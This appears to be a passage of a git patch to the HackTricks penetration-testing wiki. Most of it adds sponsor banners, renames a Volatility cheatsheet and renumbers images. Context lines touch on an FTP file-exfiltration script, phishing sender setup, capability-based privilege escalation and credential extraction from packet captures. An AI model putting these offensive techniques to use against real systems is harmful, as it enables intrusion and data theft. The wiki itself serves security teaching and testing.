From 15cf8e6581ac25d97a1d49f6e528d3492b559e2e Mon Sep 17 00:00:00 2001 From: CPol Date: Tue, 25 Oct 2022 15:56:49 +0000 Subject: [PATCH] GitBook: [#3622] No subject --- README.md | 2 +- SUMMARY.md | 2 +- cryptography/certificates.md | 2 +- .../linux-exploiting-basic-esp/README.md | 2 +- .../memory-dump-analysis/README.md | 22 ++++- .../partitions-file-systems-carving/README.md | 2 +- .../pcap-inspection/README.md | 26 +++++- .../windows-forensics/README.md | 2 +- .../volatility-cheatsheet.md | 68 ++++++++++---- .../exfiltration.md | 6 +- .../phishing-methodology/README.md | 2 +- .../linux-capabilities.md | 43 ++++++++- .../macos-mdm/README.md | 2 +- mobile-pentesting/ios-pentesting/README.md | 2 +- .../pentesting-mysql.md | 24 +++++ .../iis-internet-information-services.md | 2 +- pentesting-web/abusing-hop-by-hop-headers.md | 59 ++++++------ pentesting-web/formula-doc-latex-injection.md | 2 +- pentesting-web/login-bypass/README.md | 42 +++++---- pentesting-web/saml-attacks/README.md | 2 +- pentesting-web/sql-injection/README.md | 34 +++++++ .../sql-injection/mysql-injection/README.md | 90 ++++++++++--------- .../README.md | 26 +++++- .../dpapi-extracting-passwords.md | 24 +++-- 24 files changed, 352 insertions(+), 136 deletions(-) rename forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md => generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md (90%) diff --git a/README.md b/README.md index e0b5edd20..effe7095e 100644 --- a/README.md +++ b/README.md @@ -40,7 +40,7 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm ### [RootedCON](https://www.rootedcon.com/) -
+
[**RootedCON**](https://www.rootedcon.com) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. diff --git a/SUMMARY.md b/SUMMARY.md index 612e177c4..672e94d32 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -36,7 +36,7 @@ * [Linux Forensics](forensics/basic-forensic-methodology/linux-forensics.md) * [Malware Analysis](forensics/basic-forensic-methodology/malware-analysis.md) * [Memory dump analysis](forensics/basic-forensic-methodology/memory-dump-analysis/README.md) - * [Volatility - CheatSheet](forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md) + * [Volatility - CheatSheet](generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) * [Partitions/File Systems/Carving](forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md) * [EXT](forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md) * [File/Data Carving & Recovery Tools](forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md) diff --git a/cryptography/certificates.md b/cryptography/certificates.md index d643969b7..5d14050e0 100644 --- a/cryptography/certificates.md +++ b/cryptography/certificates.md @@ -12,7 +12,7 @@ - +
**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. diff --git a/exploiting/linux-exploiting-basic-esp/README.md b/exploiting/linux-exploiting-basic-esp/README.md index 06dce2efd..300b10b7a 100644 --- a/exploiting/linux-exploiting-basic-esp/README.md +++ b/exploiting/linux-exploiting-basic-esp/README.md @@ -401,7 +401,7 @@ Get the address to this table with: **`objdump -s -j .got ./exec`** Observe how after **loading** the **executable** in GEF you can **see** the **functions** that are in the **GOT**: `gef➀ x/20x 0xDIR_GOT` -![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) +![](<../../.gitbook/assets/image (620) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) Using GEF you can **start** a **debugging** session and execute **`got`** to see the got table: diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md index 1ad73eb12..16dd053c7 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/README.md +++ b/forensics/basic-forensic-methodology/memory-dump-analysis/README.md @@ -12,11 +12,19 @@ +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + +## Start + Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md). -## [Volatility](volatility-examples.md) +## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) -The premiere open-source framework for memory dump analysis is [Volatility](volatility-examples.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant "profile" (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifacts.\ +The premiere open-source framework for memory dump analysis is [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md). Volatility is a Python script for parsing memory dumps that were gathered with an external tool (or a VMware memory image gathered by pausing the VM). So, given the memory dump file and the relevant "profile" (the OS from which the dump was gathered), Volatility can start identifying the structures in the data: running processes, passwords, etc. It is also extensible using plugins for extracting various types of artifacts.\ From: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) ## Mini dump crash report 
@@ -39,6 +47,16 @@ Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of You should **open** it using **IDA** or **Radare** to inspection it in **depth**. + + +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md index 05355ed35..151f6f565 100644 --- a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -61,7 +61,7 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command) -![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (3).png>) +![](<../../../.gitbook/assets/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) And then use the following code diff --git a/forensics/basic-forensic-methodology/pcap-inspection/README.md b/forensics/basic-forensic-methodology/pcap-inspection/README.md index 6e29e63d0..2bcf9efe6 100644 --- a/forensics/basic-forensic-methodology/pcap-inspection/README.md +++ b/forensics/basic-forensic-methodology/pcap-inspection/README.md @@ -1,7 +1,5 @@ # Pcap Inspection -## Pcap Inspection -
Support HackTricks and get benefits! @@ -14,6 +12,14 @@
+
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + + + {% hint style="info" %} A note about **PCAP** vs **PCAPNG**: there are two versions of the PCAP file format; **PCAPNG is newer and not supported by all tools**. You may need to convert a file from PCAPNG to PCAP using Wireshark or another compatible tool, in order to work with it in some other tools. {% endhint %} @@ -111,6 +117,14 @@ Using common carving techniques can be useful to extract files and information f You can use tools like [https://github.com/lgandx/PCredz](https://github.com/lgandx/PCredz) to parse credentials from a pcap or a live interface. + + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Check Exploits/Malware ### Suricata @@ -239,6 +253,14 @@ rita show-exploded-dns -H --limit 10 zeek_logs [usb-keystrokes.md](usb-keystrokes.md) {% endcontent-ref %} +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 3b3b94c89..937c43248 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -156,7 +156,7 @@ The files in the folder WPDNSE are a copy of the original ones, then won't survi Check the file `C:\Windows\inf\setupapi.dev.log` to get the timestamps about when the USB connection was produced (search for `Section start`). -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (7).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (12).png>) ### USB Detective diff --git a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md similarity index 90% rename from forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md rename to generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md index fee083dac..ebbd5ceae 100644 --- a/forensics/basic-forensic-methodology/memory-dump-analysis/volatility-examples.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md 
@@ -4,18 +4,24 @@ Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+​ + +
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + + + If you want something **fast and crazy** that will launch several Volatility plugins on parallel you can use: [https://github.com/carlospolop/autoVolatility](https://github.com/carlospolop/autoVolatility) ```bash @@ -176,6 +182,16 @@ The memory dump of a process will **extract everything** of the current status o volatility -f file.dmp --profile=Win7SP1x86 memdump -p 2168 -D conhost/ ``` + + +​ + +
+ +​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Processes ### List processes @@ -399,6 +415,16 @@ volatility --profile=Win7SP1x86_23418 -f file.dmp userassist {% endtab %} {% endtabs %} + + +​ + +
+ +​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Services {% tabs %} @@ -786,18 +812,24 @@ volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp The MBR holds the information on how the logical partitions, containing [file systems](https://en.wikipedia.org/wiki/File\_system), are organized on that medium. The MBR also contains executable code to function as a loader for the installed operating systemβ€”usually by passing control over to the loader's [second stage](https://en.wikipedia.org/wiki/Second-stage\_boot\_loader), or in conjunction with each partition's [volume boot record](https://en.wikipedia.org/wiki/Volume\_boot\_record) (VBR). This MBR code is usually referred to as a [boot loader](https://en.wikipedia.org/wiki/Boot\_loader). From [here](https://en.wikipedia.org/wiki/Master\_boot\_record). + + +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index 72f583f24..b312ce58a 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -12,7 +12,7 @@
-\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -159,7 +159,7 @@ echo bye >> ftp.txt ftp -n -v -s:ftp.txt ``` -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} @@ -371,7 +371,7 @@ Now we just copy-paste the text into our windows-shell. And it will automaticall * [https://github.com/62726164/dns-exfil](https://github.com/62726164/dns-exfil) -\ +\ **Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! {% embed url="https://go.intigriti.com/hacktricks" %} diff --git a/generic-methodologies-and-resources/phishing-methodology/README.md b/generic-methodologies-and-resources/phishing-methodology/README.md index 6fe94667f..40b7e498c 100644 --- a/generic-methodologies-and-resources/phishing-methodology/README.md +++ b/generic-methodologies-and-resources/phishing-methodology/README.md 
@@ -337,7 +337,7 @@ The page www.mail-tester.com can indicate you if you your domain is being blocke * Decide from which account are you going to send the phishing emails. Suggestions: _noreply, support, servicedesk, salesforce..._ * You can leave blank the username and password, but make sure to check the Ignore Certificate Errors -![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (6).png>) +![](<../../.gitbook/assets/image (253) (1) (2) (1) (1) (2) (2) (3) (3) (5) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1).png>) {% hint style="info" %} It's recommended to use the "**Send Test Email**" functionality to test that everything is working.\ diff --git a/linux-hardening/privilege-escalation/linux-capabilities.md b/linux-hardening/privilege-escalation/linux-capabilities.md index 5c1ca9ce6..4fcfc00fe 100644 --- a/linux-hardening/privilege-escalation/linux-capabilities.md +++ b/linux-hardening/privilege-escalation/linux-capabilities.md @@ -1,7 +1,5 @@ # Linux Capabilities -## Linux Capabilities -
Support HackTricks and get benefits! @@ -14,10 +12,17 @@
-Linux capabilities **provide a subset of the available root privileges** to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation. +
+ +​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\ + + +{% embed url="https://www.rootedcon.com/" %} ## Why capabilities? +Linux capabilities **provide a subset of the available root privileges** to a process. This effectively breaks up root privileges into smaller and distinctive units. Each of these units can then be independently be granted to processes. This way the full set of privileges is reduced and decreasing the risks of exploitation. + To better understand how Linux capabilities work, let’s have a look first at the problem it tries to solve. Let’s assume we are running a process as a normal user. This means we are non-privileged. We can only access data that owned by us, our group, or which is marked for access by all users. At some point in time, our process needs a little bit more permissions to fulfill its duties, like opening a network socket. The problem is that normal users can not open a socket, as this requires root permissions. @@ -328,6 +333,14 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash ``` +​ + +
+ +​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## Privesc/Container Escape Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root. @@ -957,6 +970,14 @@ I exploit needs to find a pointer to something mounted on the host. The original **The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com) +​ + +
+ +​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## CAP\_DAC\_OVERRIDE **This mean that you can bypass write permission checks on any file, so you can write any file.** @@ -1350,6 +1371,14 @@ kill -s SIGUSR1 [electron-cef-chromium-debugger-abuse.md](electron-cef-chromium-debugger-abuse.md) {% endcontent-ref %} +​ + +
+ +​​​​​​​​​​​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## CAP\_NET\_BIND\_SERVICE **This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability. @@ -1540,6 +1569,14 @@ In addition, this capability also allows the process to view `dmesg` output, if * [https://www.linuxjournal.com/article/5737](https://www.linuxjournal.com/article/5737) * [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module) +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md index d911a43eb..c26af96ff 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-mdm/README.md @@ -142,7 +142,7 @@ The response is a JSON dictionary with some important data like: * Signed using the **device identity certificate (from APNS)** * **Certificate chain** includes expired **Apple iPhone Device CA** -![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).png>) +![](<../../../.gitbook/assets/image (567) (1) (2) (2) (2) (2) (2) (2) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1).png>) ### Step 6: Profile Installation diff --git a/mobile-pentesting/ios-pentesting/README.md b/mobile-pentesting/ios-pentesting/README.md index 2dae69140..9a7e27ad9 100644 --- a/mobile-pentesting/ios-pentesting/README.md +++ b/mobile-pentesting/ios-pentesting/README.md 
@@ -723,7 +723,7 @@ You can collect console logs through the Xcode **Devices** window as follows: 5. Reproduce the problem. 6. Click on the **Open Console** button located in the upper right-hand area of the Devices window to view the console logs on a separate window. -![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (2).png>) +![](<../../.gitbook/assets/image (466) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (15).png>) You can also connect to the device shell as explained in Accessing the Device Shell, install **socat** via **apt-get** and run the following command: diff --git a/network-services-pentesting/pentesting-mysql.md b/network-services-pentesting/pentesting-mysql.md index 57b1085c8..f50e4b74a 100644 --- a/network-services-pentesting/pentesting-mysql.md +++ b/network-services-pentesting/pentesting-mysql.md @@ -12,6 +12,12 @@
+
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## **Basic Information** **MySQL** is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (**SQL**). From [here](https://www.siteground.com/tutorials/php-mysql/mysql/). @@ -149,6 +155,14 @@ ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti **In this paper you can see a complete description of the attack and even how to extend it to RCE:** [**https://paper.seebug.org/1113/**](https://paper.seebug.org/1113/)\ **Here you can find an overview of the attack:** [**http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/**](http://russiansecurity.expert/2016/04/20/mysql-connect-file-read/) +​ + +
+ +​​[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} + ## POST ### Mysql User @@ -646,6 +660,16 @@ Entry_4: ``` + + +​ + +
+ +[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline. + +{% embed url="https://www.rootedcon.com/" %} +
Support HackTricks and get benefits! diff --git a/network-services-pentesting/pentesting-web/iis-internet-information-services.md b/network-services-pentesting/pentesting-web/iis-internet-information-services.md index 73babd4b3..5a1b0c332 100644 --- a/network-services-pentesting/pentesting-web/iis-internet-information-services.md +++ b/network-services-pentesting/pentesting-web/iis-internet-information-services.md @@ -332,7 +332,7 @@ C:\xampp\tomcat\conf\server.xml If you see an error like the following one: -![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1) (3).png>) +![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (1) (1).png>) It means that the server **didn't receive the correct domain name** inside the Host header.\ In order to access the web page you could take a look to the served **SSL Certificate** and maybe you can find the domain/subdomain name in there. If it isn't there you may need to **brute force VHosts** until you find the correct one. diff --git a/pentesting-web/abusing-hop-by-hop-headers.md b/pentesting-web/abusing-hop-by-hop-headers.md index 5db95d952..173c7b4bb 100644 --- a/pentesting-web/abusing-hop-by-hop-headers.md +++ b/pentesting-web/abusing-hop-by-hop-headers.md @@ -1,23 +1,24 @@ - +# hop-by-hop headers
Support HackTricks and get benefits! -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** +* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! 
+* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) +* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** +* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
